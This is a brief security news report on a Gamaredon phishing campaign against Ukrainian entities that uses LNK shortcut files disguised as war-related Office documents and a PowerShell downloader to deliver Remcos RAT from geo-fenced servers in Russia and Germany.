A phishing campaign targeting Ukrainian entities has been discovered, utilizing a remote access trojan called Remcos RAT. Researchers report that the campaign, attributed to the Russian hacking group Gamaredon, employs cleverly disguised Windows shortcut files that masquerade as Microsoft Office documents related to the Russo-Ukrainian war. These files deliver a backdoor via geo-fenced servers in Russia and Germany. Gamaredon is known for espionage against Ukraine since at least 2013, while the current strategy cleverly uses PowerShell to execute malicious commands.
The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to download the second stage ZIP file containing the Remcos backdoor.
The latest campaign is characterized by the distribution of Windows shortcut (LNK) files compressed inside ZIP archives, disguising them as Microsoft Office documents related to the ongoing Russo-Ukrainian war.
Collection
[
|
...
]